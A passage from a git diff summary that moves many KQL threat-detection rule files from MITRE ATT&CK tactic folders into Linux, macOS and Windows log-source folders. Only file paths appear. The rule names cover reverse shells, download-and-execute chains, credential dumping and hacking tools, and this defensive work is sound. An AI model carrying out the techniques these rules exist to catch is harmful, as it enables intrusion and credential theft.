KQL/rules/{Discovery => linux/process_creation}/docker_container_discovery_via_dockerenv_listing.kql (100%) rename KQL/rules/{Command and Control => 
linux/process_creation}/download_file_to_potentially_suspicious_directory_via_wget.kql (100%) rename KQL/rules/{Execution => linux/process_creation}/enable_bpf_kprobes_tracing.kql (100%) rename KQL/rules/{Persistence => linux/process_creation}/esxi_account_creation_via_esxcli.kql (100%) rename KQL/rules/{Persistence => linux/process_creation}/esxi_admin_permission_assigned_to_account_via_esxcli.kql (100%) rename KQL/rules/{Discovery => linux/process_creation}/esxi_network_configuration_discovery_via_esxcli.kql (100%) rename KQL/rules/{Discovery => linux/process_creation}/esxi_storage_information_discovery_via_esxcli.kql (100%) rename KQL/rules/{Defense Evasion => linux/process_creation}/esxi_syslog_configuration_change_via_esxcli.kql (100%) rename KQL/rules/{Discovery => linux/process_creation}/esxi_system_information_discovery_via_esxcli.kql (100%) rename KQL/rules/{Execution => linux/process_creation}/esxi_vm_kill_via_esxcli.kql (100%) rename KQL/rules/{Discovery => linux/process_creation}/esxi_vm_list_discovery_via_esxcli.kql (100%) rename KQL/rules/{Discovery => linux/process_creation}/esxi_vsan_information_discovery_via_esxcli.kql (100%) rename KQL/rules/{Execution => linux/process_creation}/execution_of_script_located_in_potentially_suspicious_directory.kql (100%) rename KQL/rules/{Discovery => linux/process_creation}/file_and_directory_discovery_linux.kql (100%) rename KQL/rules/{Defense Evasion => linux/process_creation}/file_deletion.kql (100%) rename KQL/rules/{Defense Evasion => linux/process_creation}/flush_iptables_ufw_chain.kql (100%) rename KQL/rules/{Impact => linux/process_creation}/group_has_been_deleted_via_groupdel.kql (100%) rename KQL/rules/{Impact => linux/process_creation}/history_file_deletion.kql (100%) rename KQL/rules/{Execution => linux/process_creation}/inline_python_execution_spawn_shell_via_os_system_library.kql (100%) rename KQL/rules/{Defense Evasion => linux/process_creation}/install_root_certificate.kql (100%) rename 
KQL/rules/{Execution => linux/process_creation}/interactive_bash_suspicious_children.kql (100%) rename KQL/rules/{Execution => linux/process_creation}/kaspersky_endpoint_security_stopped_via_commandline_linux.kql (100%) rename KQL/rules/{Defense Evasion => linux/process_creation}/linux_base64_encoded_pipe_to_shell.kql (100%) rename KQL/rules/{Defense Evasion => linux/process_creation}/linux_base64_encoded_shebang_in_cli.kql (100%) rename KQL/rules/{Impact => linux/process_creation}/linux_crypto_mining_indicators.kql (100%) rename KQL/rules/{Defense Evasion => linux/process_creation}/linux_doas_tool_execution.kql (100%) rename KQL/rules/{Execution => linux/process_creation}/linux_hacktool_execution.kql (100%) rename KQL/rules/{Discovery => linux/process_creation}/linux_network_service_scanning_tools_execution.kql (100%) rename KQL/rules/{Defense Evasion => linux/process_creation}/linux_package_uninstall.kql (100%) rename KQL/rules/{Reconnaissance => linux/process_creation}/linux_recon_indicators.kql (100%) rename KQL/rules/{Discovery => linux/process_creation}/linux_remote_system_discovery.kql (100%) rename KQL/rules/{Defense Evasion => linux/process_creation}/linux_shell_pipe_to_shell.kql (100%) rename KQL/rules/{Privilege Escalation => linux/process_creation}/linux_sudo_chroot_execution.kql (100%) rename KQL/rules/{Persistence => linux/process_creation}/linux_webshell_indicators.kql (100%) rename KQL/rules/{Discovery => linux/process_creation}/local_groups_discovery_linux.kql (100%) rename KQL/rules/{Discovery => linux/process_creation}/local_system_accounts_discovery_linux.kql (100%) rename KQL/rules/{Persistence => linux/process_creation}/mask_system_power_settings_via_systemctl.kql (100%) rename KQL/rules/{Credential Access => linux/process_creation}/mount_execution_with_hidepid_parameter.kql (100%) rename KQL/rules/{Execution => linux/process_creation}/named_pipe_created_via_mkfifo.kql (100%) rename KQL/rules/{Execution => 
linux/process_creation}/nohup_execution.kql (100%) rename KQL/rules/{Discovery => linux/process_creation}/os_architecture_discovery_via_grep.kql (100%) rename KQL/rules/{Discovery => linux/process_creation}/pnscan_binary_data_transmission_activity.kql (100%) rename KQL/rules/{Discovery => linux/process_creation}/potential_container_discovery_via_inodes_listing.kql (68%) rename KQL/rules/{Discovery => linux/process_creation}/potential_discovery_activity_using_find_linux.kql (100%) rename KQL/rules/{Discovery => linux/process_creation}/potential_gobrat_file_discovery_via_grep.kql (100%) rename KQL/rules/{Command and Control => linux/process_creation}/potential_linux_amazon_ssm_agent_hijacking.kql (100%) rename KQL/rules/{Privilege Escalation => linux/process_creation}/potential_linux_process_code_injection_via_dd_utility.kql (100%) rename KQL/rules/{Execution => linux/process_creation}/potential_netcat_reverse_shell_execution.kql (100%) rename KQL/rules/{Execution => linux/process_creation}/potential_perl_reverse_shell_execution.kql (100%) rename KQL/rules/{Execution => linux/process_creation}/potential_php_reverse_shell.kql (100%) rename KQL/rules/{Execution => linux/process_creation}/potential_ruby_reverse_shell.kql (100%) rename KQL/rules/{Impact => linux/process_creation}/potential_suspicious_change_to_sensitive_critical_files.kql (100%) rename KQL/rules/{Execution => linux/process_creation}/potential_xterm_reverse_shell.kql (100%) rename KQL/rules/{Defense Evasion => linux/process_creation}/potentially_suspicious_execution_from_tmp_folder.kql (100%) rename KQL/rules/{Execution => linux/process_creation}/potentially_suspicious_named_pipe_created_via_mkfifo.kql (100%) rename KQL/rules/{Reconnaissance => linux/process_creation}/print_history_file_contents.kql (100%) rename KQL/rules/{Discovery => linux/process_creation}/pua_trufflehog_execution_linux.kql (100%) rename KQL/rules/{Execution => 
linux/process_creation}/python_reverse_shell_execution_via_pty_and_socket_modules.kql (100%) rename KQL/rules/{Execution => linux/process_creation}/python_spawning_pretty_tty_via_pty_module.kql (100%) rename KQL/rules/{Exfiltration => linux/process_creation}/python_webserver_execution_linux.kql (100%) rename KQL/rules/{Persistence => linux/process_creation}/remote_access_tool_team_viewer_session_started_on_linux_host.kql (100%) rename KQL/rules/{Defense Evasion => linux/process_creation}/remove_immutable_file_attribute.kql (100%) rename KQL/rules/{Defense Evasion => linux/process_creation}/remove_scheduled_cron_task_job.kql (100%) rename KQL/rules/{Execution => linux/process_creation}/scheduled_cron_task_job_linux.kql (100%) rename KQL/rules/{Privilege Escalation => linux/process_creation}/scheduled_task_job_at.kql (100%) rename KQL/rules/{Discovery => linux/process_creation}/security_software_discovery_linux.kql (100%) rename KQL/rules/{Defense Evasion => linux/process_creation}/setuid_and_setgid.kql (100%) rename KQL/rules/{Discovery => linux/process_creation}/shell_execution_gcc_linux.kql (100%) rename KQL/rules/{Execution => linux/process_creation}/shell_execution_of_process_located_in_tmp_directory.kql (100%) rename KQL/rules/{Discovery => linux/process_creation}/shell_execution_via_find_linux.kql (100%) rename KQL/rules/{Discovery => linux/process_creation}/shell_execution_via_flock_linux.kql (100%) rename KQL/rules/{Execution => linux/process_creation}/shell_execution_via_git_linux.kql (100%) rename KQL/rules/{Discovery => linux/process_creation}/shell_execution_via_nice_linux.kql (100%) rename KQL/rules/{Execution => linux/process_creation}/shell_execution_via_rsync_linux.kql (100%) rename KQL/rules/{Discovery => linux/process_creation}/shell_invocation_via_apt_linux.kql (100%) rename KQL/rules/{Execution => linux/process_creation}/shell_invocation_via_env_command_linux.kql (100%) rename KQL/rules/{Execution => 
linux/process_creation}/shell_invocation_via_ssh_linux.kql (100%) rename KQL/rules/{Command and Control => linux/process_creation}/suspicious_curl_change_user_agents_linux.kql (100%) rename KQL/rules/{Exfiltration => linux/process_creation}/suspicious_curl_file_upload_linux.kql (100%) rename KQL/rules/{Execution => linux/process_creation}/suspicious_download_and_execute_pattern_via_curl_wget.kql (100%) rename KQL/rules/{Reconnaissance => linux/process_creation}/suspicious_git_clone_linux.kql (100%) rename KQL/rules/{Execution => linux/process_creation}/suspicious_invocation_of_shell_via_awk_linux.kql (100%) rename KQL/rules/{Execution => linux/process_creation}/suspicious_invocation_of_shell_via_rsync.kql (100%) rename KQL/rules/{Execution => linux/process_creation}/suspicious_java_children_processes.kql (100%) rename KQL/rules/{Execution => linux/process_creation}/suspicious_nohup_execution.kql (100%) rename KQL/rules/{Defense Evasion => linux/process_creation}/suspicious_package_installed_linux.kql (100%) rename KQL/rules/{Defense Evasion => linux/process_creation}/syslog_clearing_or_removal_via_system_utilities.kql (100%) rename KQL/rules/{Discovery => linux/process_creation}/system_information_discovery.kql (100%) rename KQL/rules/{Discovery => linux/process_creation}/system_network_connections_discovery_linux.kql (100%) rename KQL/rules/{Discovery => linux/process_creation}/system_network_discovery_linux.kql (100%) rename KQL/rules/{Defense Evasion => linux/process_creation}/touch_suspicious_service_file.kql (100%) rename KQL/rules/{Defense Evasion => linux/process_creation}/triple_cross_ebpf_rootkit_execve_hijack.kql (100%) rename KQL/rules/{Defense Evasion => linux/process_creation}/triple_cross_ebpf_rootkit_install_commands.kql (100%) rename KQL/rules/{Defense Evasion => linux/process_creation}/ufw_force_stop_using_ufw_init.kql (100%) rename KQL/rules/{Privilege Escalation => linux/process_creation}/user_added_to_root_sudoers_group_using_usermod.kql (100%) 
rename KQL/rules/{Impact => linux/process_creation}/user_has_been_deleted_via_userdel.kql (100%) rename KQL/rules/{Discovery => linux/process_creation}/vim_gtfobin_abuse_linux.kql (100%) rename KQL/rules/{Persistence => macos/file_event}/macos_emond_launch_daemon.kql (100%) rename KQL/rules/{Persistence => macos/file_event}/startup_item_file_created_macos.kql (100%) rename KQL/rules/{Defense Evasion => macos/process_creation}/binary_padding_macos.kql (100%) rename KQL/rules/{Collection => macos/process_creation}/clipboard_data_collection_via_osascript.kql (100%) rename KQL/rules/{Persistence => macos/process_creation}/creation_of_a_local_user_account.kql (100%) rename KQL/rules/{Credential Access => macos/process_creation}/credentials_from_password_stores_keychain.kql (100%) rename KQL/rules/{Credential Access => macos/process_creation}/credentials_in_files.kql (100%) rename KQL/rules/{Defense Evasion => macos/process_creation}/decode_base64_encoded_text_macos.kql (100%) rename KQL/rules/{Defense Evasion => macos/process_creation}/disable_security_tools.kql (100%) rename KQL/rules/{Exfiltration => macos/process_creation}/disk_image_creation_via_hdiutil_macos.kql (100%) rename KQL/rules/{Initial Access => macos/process_creation}/disk_image_mounting_via_hdiutil_macos.kql (100%) rename KQL/rules/{Discovery => macos/process_creation}/file_and_directory_discovery_macos.kql (100%) rename KQL/rules/{Defense Evasion => macos/process_creation}/file_download_via_nscurl_macos.kql (100%) rename KQL/rules/{Defense Evasion => macos/process_creation}/file_time_attribute_change.kql (100%) rename KQL/rules/{Defense Evasion => macos/process_creation}/gatekeeper_bypass_via_xattr.kql (100%) rename KQL/rules/{Privilege Escalation => macos/process_creation}/guest_account_enabled_via_sysadminctl.kql (100%) rename KQL/rules/{Collection => macos/process_creation}/gui_input_capture_macos.kql (100%) rename KQL/rules/{Defense Evasion => 
macos/process_creation}/hidden_flag_set_on_file_directory_via_chflags_macos.kql (100%) rename KQL/rules/{Defense Evasion => macos/process_creation}/hidden_user_creation.kql (100%) rename KQL/rules/{Defense Evasion => macos/process_creation}/indicator_removal_on_host_clear_mac_system_logs.kql (100%) rename KQL/rules/{Execution => macos/process_creation}/jamf_mdm_execution.kql (100%) rename KQL/rules/{Execution => macos/process_creation}/jamf_mdm_potential_suspicious_child_process.kql (100%) rename KQL/rules/{Execution => macos/process_creation}/jxa_in_memory_execution_via_osascript.kql (100%) rename KQL/rules/{Privilege Escalation => macos/process_creation}/launch_agent_daemon_execution_via_launchctl.kql (100%) rename KQL/rules/{Discovery => macos/process_creation}/local_groups_discovery_macos.kql (100%) rename KQL/rules/{Discovery => macos/process_creation}/local_system_accounts_discovery_macos.kql (100%) rename KQL/rules/{Discovery => macos/process_creation}/macos_network_service_scanning.kql (100%) rename KQL/rules/{Discovery => macos/process_creation}/macos_remote_system_discovery.kql (100%) rename KQL/rules/{Execution => macos/process_creation}/macos_scripting_interpreter_applescript.kql (100%) rename KQL/rules/{Discovery => macos/process_creation}/network_sniffing_macos.kql (100%) rename KQL/rules/{Impact => macos/process_creation}/new_file_exclusion_added_to_time_machine_via_tmutil_macos.kql (100%) rename KQL/rules/{Execution => macos/process_creation}/osacompile_execution_by_potentially_suspicious_applet_osascript.kql (100%) rename KQL/rules/{Execution => macos/process_creation}/osacompile_run_only_execution.kql (100%) rename KQL/rules/{Execution => macos/process_creation}/payload_decoded_and_decrypted_via_built_in_utilities.kql (100%) rename KQL/rules/{Defense Evasion => macos/process_creation}/potential_base64_decoded_from_images.kql (100%) rename KQL/rules/{Discovery => macos/process_creation}/potential_discovery_activity_using_find_macos.kql (100%) 
rename KQL/rules/{Command and Control => macos/process_creation}/potential_in_memory_download_and_compile_of_payloads.kql (100%) rename KQL/rules/{Privilege Escalation => macos/process_creation}/potential_persistence_via_plistbuddy.kql (100%) rename KQL/rules/{Command and Control => macos/process_creation}/potential_wizardupdate_malware_infection.kql (100%) rename KQL/rules/{Command and Control => macos/process_creation}/potential_xcsset_malware_infection.kql (100%) rename KQL/rules/{Command and Control => macos/process_creation}/remote_access_tool_potential_meshagent_execution_macos.kql (100%) rename KQL/rules/{Command and Control => macos/process_creation}/remote_access_tool_renamed_meshagent_execution_macos.kql (100%) rename KQL/rules/{Persistence => macos/process_creation}/remote_access_tool_team_viewer_session_started_on_macos_host.kql (100%) rename KQL/rules/{Privilege Escalation => macos/process_creation}/root_account_enable_via_dsenableroot.kql (100%) rename KQL/rules/{Execution => macos/process_creation}/scheduled_cron_task_job_macos.kql (100%) rename KQL/rules/{Collection => macos/process_creation}/screen_capture_macos.kql (100%) rename KQL/rules/{Discovery => macos/process_creation}/security_software_discovery_macos.kql (100%) rename KQL/rules/{Defense Evasion => macos/process_creation}/space_after_filename_macos.kql (100%) rename KQL/rules/{Exfiltration => macos/process_creation}/split_a_file_into_pieces.kql (100%) rename KQL/rules/{Initial Access => macos/process_creation}/suspicious_browser_child_process_macos.kql (100%) rename KQL/rules/{Initial Access => macos/process_creation}/suspicious_execution_via_macos_script_editor.kql (100%) rename KQL/rules/{Credential Access => macos/process_creation}/suspicious_history_file_operations.kql (100%) rename KQL/rules/{Execution => macos/process_creation}/suspicious_installer_package_child_process.kql (100%) rename KQL/rules/{Impact => macos/process_creation}/suspicious_macos_firmware_activity.kql (100%) rename 
KQL/rules/{Execution => macos/process_creation}/suspicious_microsoft_office_child_process_macos.kql (100%) rename KQL/rules/{Discovery => macos/process_creation}/system_information_discovery_using_ioreg.kql (100%) rename KQL/rules/{Discovery => macos/process_creation}/system_information_discovery_using_sw_vers.kql (100%) rename KQL/rules/{Discovery => macos/process_creation}/system_information_discovery_using_system_profiler.kql (100%) rename KQL/rules/{Defense Evasion => macos/process_creation}/system_information_discovery_via_sysctl_macos.kql (100%) rename KQL/rules/{Discovery => macos/process_creation}/system_integrity_protection_sip_disabled.kql (100%) rename KQL/rules/{Discovery => macos/process_creation}/system_integrity_protection_sip_enumeration.kql (100%) rename KQL/rules/{Discovery => macos/process_creation}/system_network_connections_discovery_macos.kql (100%) rename KQL/rules/{Discovery => macos/process_creation}/system_network_discovery_macos.kql (100%) rename KQL/rules/{Impact => macos/process_creation}/system_shutdown_reboot_macos.kql (100%) rename KQL/rules/{Impact => macos/process_creation}/time_machine_backup_deletion_attempt_via_tmutil_macos.kql (100%) rename KQL/rules/{Impact => macos/process_creation}/time_machine_backup_disabled_via_tmutil_macos.kql (100%) rename KQL/rules/{Persistence => macos/process_creation}/user_added_to_admin_group_via_dscl.kql (100%) rename KQL/rules/{Persistence => macos/process_creation}/user_added_to_admin_group_via_dseditgroup.kql (100%) rename KQL/rules/{Persistence => macos/process_creation}/user_added_to_admin_group_via_sysadminctl.kql (100%) rename KQL/rules/{Defense Evasion => windows/builtin/security/account_management}/outgoing_logon_with_new_credentials.kql (100%) rename KQL/rules/{Execution => windows/builtin/security/account_management}/successful_account_login_via_wmi.kql (100%) rename KQL/rules/{Discovery => windows/builtin/security}/azure_ad_health_monitoring_agent_registry_keys_access.kql (100%) rename 
KQL/rules/{Discovery => windows/builtin/security}/azure_ad_health_service_agents_registry_keys_access.kql (100%) rename KQL/rules/{Credential Access => windows/builtin/security}/file_access_of_signal_desktop_sensitive_data.kql (100%) rename KQL/rules/{Impact => windows/builtin/security}/potential_secure_deletion_with_sdelete.kql (100%) rename KQL/rules/{Collection => windows/builtin/security}/processes_accessing_the_microphone_and_webcam.kql (100%) rename KQL/rules/{Discovery => windows/builtin/security}/sam_registry_hive_handle_request.kql (100%) rename KQL/rules/{Credential Access => windows/builtin/security}/suspicious_teams_application_related_objectacess_event.kql (100%) rename KQL/rules/{Discovery => windows/builtin/security}/syskey_registry_keys_access.kql (100%) rename KQL/rules/{Credential Access => windows/builtin/security}/wce_wceaux_dll_access.kql (100%) rename KQL/rules/{Defense Evasion => windows/builtin/security}/windows_defender_exclusion_list_modified.kql (100%) rename KQL/rules/{Persistence => windows/builtin/security}/wmi_persistence_security.kql (100%) rename KQL/rules/{Credential Access => windows/file/file_access}/access_to_crypto_currency_wallets_by_uncommon_applications.kql (100%) rename KQL/rules/{Credential Access => windows/file/file_access}/access_to_potentially_sensitive_sysvol_files_by_uncommon_applications.kql (100%) rename KQL/rules/{Credential Access => windows/file/file_access}/access_to_windows_credential_history_file_by_uncommon_applications.kql (100%) rename KQL/rules/{Credential Access => windows/file/file_access}/access_to_windows_dpapi_master_keys_by_uncommon_applications.kql (100%) rename KQL/rules/{Credential Access => windows/file/file_access}/credential_manager_access_by_uncommon_applications.kql (100%) rename KQL/rules/{Credential Access => windows/file/file_access}/microsoft_teams_sensitive_file_access_by_uncommon_applications.kql (100%) rename KQL/rules/{Credential Access => 
windows/file/file_access}/suspicious_file_access_to_browser_credential_storage.kql (100%) rename KQL/rules/{Persistence => windows/file/file_change}/unusual_file_modification_by_dns_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_delete}/ads_zone_identifier_deleted_by_uncommon_application.kql (100%) rename KQL/rules/{Impact => windows/file/file_delete}/backup_files_deleted.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_delete}/eventlog_evtx_file_deleted.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_delete}/exchange_powershell_cmdlet_history_deleted.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_delete}/file_deleted_via_sysinternals_sdelete.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_delete}/iis_webserver_access_logs_deleted.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_delete}/powershell_console_history_logs_deleted.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_delete}/prefetch_file_deleted.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_delete}/teamviewer_log_file_deleted.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_delete}/tomcat_webserver_logs_deleted.kql (100%) rename KQL/rules/{Persistence => windows/file/file_delete}/unusual_file_deletion_by_dns_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/_rdp_file_created_by_uncommon_application.kql (100%) rename KQL/rules/{Discovery => windows/file/file_event}/adexplorer_writing_complete_ad_snapshot_into_dat_file.kql (100%) rename KQL/rules/{Command and Control => windows/file/file_event}/adsi_cache_file_creation_by_uncommon_tool.kql (100%) rename KQL/rules/{Discovery => windows/file/file_event}/advanced_ip_scanner_file_event.kql (100%) rename KQL/rules/{Execution => windows/file/file_event}/adwind_rat_jrat_file_artifact.kql (100%) rename KQL/rules/{Command and Control => 
windows/file/file_event}/anydesk_temporary_artefact.kql (100%) rename KQL/rules/{Execution => windows/file/file_event}/assembly_dll_creation_via_aspnetcompiler.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl_file.kql (100%) rename KQL/rules/{Discovery => windows/file/file_event}/bloodhound_collection_files.kql (100%) rename KQL/rules/{Privilege Escalation => windows/file/file_event}/created_files_by_microsoft_sync_center.kql (100%) rename KQL/rules/{Privilege Escalation => windows/file/file_event}/creation_exe_for_service_with_unquoted_path.kql (100%) rename KQL/rules/{Resource Development => windows/file/file_event}/creation_of_a_diagcab.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/creation_of_non_existent_system_dll.kql (100%) rename KQL/rules/{Privilege Escalation => windows/file/file_event}/creation_of_werfault_exe_wer_dll_in_unusual_folder.kql (100%) rename KQL/rules/{Credential Access => windows/file/file_event}/cred_dump_tools_dropped_files.kql (69%) rename KQL/rules/{Execution => windows/file/file_event}/csexec_service_file_creation.kql (100%) rename KQL/rules/{Persistence => windows/file/file_event}/dll_search_order_hijackig_via_additional_space_in_path.kql (100%) rename KQL/rules/{Credential Access => windows/file/file_event}/dpapi_backup_keys_and_certificate_export_activity_ioc.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/drop_binaries_into_spool_drivers_color_folder.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/dynamic_csharp_compile_artefact.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/evtx_created_in_uncommon_location.kql (100%) rename KQL/rules/{Privilege Escalation => windows/file/file_event}/file_creation_in_suspicious_directory_by_msdt_exe.kql (100%) rename KQL/rules/{Execution => 
windows/file/file_event}/file_with_uncommon_extension_created_by_an_office_application.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/files_with_system_dll_name_in_unsuspected_locations.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/files_with_system_process_name_in_unsuspected_locations.kql (100%) rename KQL/rules/{Discovery => windows/file/file_event}/gathernetworkinfo_vbs_reconnaissance_script_output.kql (100%) rename KQL/rules/{Command and Control => windows/file/file_event}/gotoassist_temporary_installation_artefact.kql (100%) rename KQL/rules/{Credential Access => windows/file/file_event}/hacktool_crackmapexec_file_indicators.kql (100%) rename KQL/rules/{Credential Access => windows/file/file_event}/hacktool_dumpert_process_dumper_default_file.kql (100%) rename KQL/rules/{Credential Access => windows/file/file_event}/hacktool_impacket_file_indicators.kql (100%) rename KQL/rules/{Command and Control => windows/file/file_event}/hacktool_inveigh_execution_artefacts.kql (100%) rename KQL/rules/{Credential Access => windows/file/file_event}/hacktool_mimikatz_kirbi_file_creation.kql (100%) rename KQL/rules/{Credential Access => windows/file/file_event}/hacktool_nppspy_hacktool_usage.kql (100%) rename KQL/rules/{Credential Access => windows/file/file_event}/hacktool_potential_remote_credential_dumping_activity_via_crackmapexec_or_impacket_secretsdump.kql (100%) rename KQL/rules/{Persistence => windows/file/file_event}/hacktool_powerup_write_hijack_dll.kql (100%) rename KQL/rules/{Credential Access => windows/file/file_event}/hacktool_quarkspwdump_dump_file.kql (100%) rename KQL/rules/{Command and Control => windows/file/file_event}/hacktool_remotekrbrelay_smb_relay_secrets_dump_module_indicators.kql (100%) rename KQL/rules/{Credential Access => windows/file/file_event}/hacktool_safetykatz_dump_indicator.kql (100%) rename KQL/rules/{Credential Access => 
windows/file/file_event}/hacktool_typical_hivenightmare_sam_file_export.kql (100%) rename KQL/rules/{Command and Control => windows/file/file_event}/hijack_legit_rdp_session_to_move_laterally.kql (100%) rename KQL/rules/{Command and Control => windows/file/file_event}/installation_of_teamviewer_desktop.kql (100%) rename KQL/rules/{Initial Access => windows/file/file_event}/iso_file_created_within_temp_folders.kql (100%) rename KQL/rules/{Initial Access => windows/file/file_event}/iso_or_image_mount_indicator_in_recent_files.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/legitimate_application_dropped_archive.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/legitimate_application_dropped_executable.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/legitimate_application_dropped_script.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/livekd_driver_creation.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/livekd_driver_creation_by_uncommon_process.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/livekd_kernel_memory_dump_file_created.kql (100%) rename KQL/rules/{Credential Access => windows/file/file_event}/lsass_process_dump_artefact_in_crashdumps_folder.kql (100%) rename KQL/rules/{Credential Access => windows/file/file_event}/lsass_process_memory_dump_creation_via_taskmgr_exe.kql (100%) rename KQL/rules/{Credential Access => windows/file/file_event}/lsass_process_memory_dump_files.kql (100%) rename KQL/rules/{Persistence => windows/file/file_event}/malicious_dll_file_dropped_in_the_teams_or_onedrive_folder.kql (100%) rename KQL/rules/{Execution => windows/file/file_event}/malicious_powershell_scripts_filecreation.kql (100%) rename KQL/rules/{Privilege Escalation => windows/file/file_event}/new_custom_shim_database_created.kql (100%) rename KQL/rules/{Privilege Escalation => 
windows/file/file_event}/new_outlook_macro_created.kql (100%) rename KQL/rules/{Credential Access => windows/file/file_event}/ntds_dit_created.kql (100%) rename KQL/rules/{Credential Access => windows/file/file_event}/ntds_dit_creation_by_uncommon_parent_process.kql (100%) rename KQL/rules/{Credential Access => windows/file/file_event}/ntds_dit_creation_by_uncommon_process.kql (100%) rename KQL/rules/{Credential Access => windows/file/file_event}/ntds_exfiltration_filename_patterns.kql (100%) rename KQL/rules/{Initial Access => windows/file/file_event}/octopus_scanner_malware.kql (100%) rename KQL/rules/{Initial Access => windows/file/file_event}/office_macro_file_creation.kql (100%) rename KQL/rules/{Initial Access => windows/file/file_event}/office_macro_file_creation_from_suspicious_process.kql (100%) rename KQL/rules/{Initial Access => windows/file/file_event}/office_macro_file_download.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/onenote_attachment_file_dropped_in_suspicious_location.kql (100%) rename KQL/rules/{Execution => windows/file/file_event}/pcre_net_package_temp_files.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/pdf_file_created_by_regedit_exe.kql (100%) rename KQL/rules/{Persistence => windows/file/file_event}/potential_binary_or_script_dropper_via_powershell.kql (100%) rename KQL/rules/{Lateral Movement => windows/file/file_event}/potential_dcom_internetexplorer_application_dll_hijack.kql (100%) rename KQL/rules/{Execution => windows/file/file_event}/potential_file_extension_spoofing_using_right_to_left_override.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/potential_hidden_directory_creation_via_ntfs_index_allocation_stream.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/potential_homoglyph_attack_using_lookalike_characters_in_filename.kql (100%) rename KQL/rules/{Privilege Escalation => 
windows/file/file_event}/potential_initial_access_via_dll_search_order_hijacking.kql (100%) rename KQL/rules/{Persistence => windows/file/file_event}/potential_persistence_attempt_via_errorhandler_cmd.kql (100%) rename KQL/rules/{Persistence => windows/file/file_event}/potential_persistence_via_microsoft_office_add_in.kql (100%) rename KQL/rules/{Persistence => windows/file/file_event}/potential_persistence_via_microsoft_office_startup_folder.kql (100%) rename KQL/rules/{Persistence => windows/file/file_event}/potential_persistence_via_notepad_plugins.kql (100%) rename KQL/rules/{Persistence => windows/file/file_event}/potential_persistence_via_outlook_form.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/potential_privilege_escalation_attempt_via_exe_local_technique.kql (100%) rename KQL/rules/{Privilege Escalation => windows/file/file_event}/potential_ripzip_attack_on_startup_folder.kql (100%) rename KQL/rules/{Credential Access => windows/file/file_event}/potential_sam_database_dump.kql (100%) rename KQL/rules/{Privilege Escalation => windows/file/file_event}/potential_startup_shortcut_persistence_via_powershell_exe.kql (100%) rename KQL/rules/{Persistence => windows/file/file_event}/potential_suspicious_powershell_module_file_created.kql (100%) rename KQL/rules/{Persistence => windows/file/file_event}/potential_webshell_creation_on_static_website.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/potential_winnti_dropper_activity.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/potentially_suspicious_dmp_hdmp_file_creation.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/potentially_suspicious_wdac_policy_file_creation.kql (100%) rename KQL/rules/{Persistence => windows/file/file_event}/powershell_module_file_created.kql (100%) rename KQL/rules/{Persistence => windows/file/file_event}/powershell_module_file_created_by_non_powershell_process.kql (100%) rename 
KQL/rules/{Persistence => windows/file/file_event}/powershell_profile_modification.kql (100%) rename KQL/rules/{Persistence => windows/file/file_event}/powershell_script_dropped_via_powershell_exe.kql (100%) rename KQL/rules/{Persistence => windows/file/file_event}/process_explorer_driver_creation_by_non_sysinternals_binary.kql (100%) rename KQL/rules/{Persistence => windows/file/file_event}/process_monitor_driver_creation_by_non_sysinternals_binary.kql (100%) rename KQL/rules/{Lateral Movement => windows/file/file_event}/psexec_remote_execution_file_artefact.kql (100%) rename KQL/rules/{Execution => windows/file/file_event}/psexec_service_file_creation.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/psscriptpolicytest_creation_by_uncommon_process.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/publisher_attachment_file_dropped_in_suspicious_location.kql (100%) rename KQL/rules/{Exfiltration => windows/file/file_event}/rclone_config_file_creation.kql (100%) rename KQL/rules/{Execution => windows/file/file_event}/remcom_service_file_creation.kql (100%) rename KQL/rules/{Execution => windows/file/file_event}/remote_access_tool_screenconnect_temporary_file.kql (100%) rename KQL/rules/{Command and Control => windows/file/file_event}/renamed_vscode_code_tunnel_execution_file_indicator.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/scr_file_write_event.kql (100%) rename KQL/rules/{Command and Control => windows/file/file_event}/screenconnect_temporary_installation_artefact.kql (100%) rename KQL/rules/{Defense Evasion => windows/file/file_event}/self_extraction_directive_file_created_in_potentially_suspicious_location.kql (100%) rename KQL/rules/{Privilege Escalation => windows/file/file_event}/startup_folder_file_write.kql (100%) rename KQL/rules/{Persistence => windows/file/file_event}/suspicious_aspx_file_drop_by_exchange.kql (100%) rename KQL/rules/{Execution => 
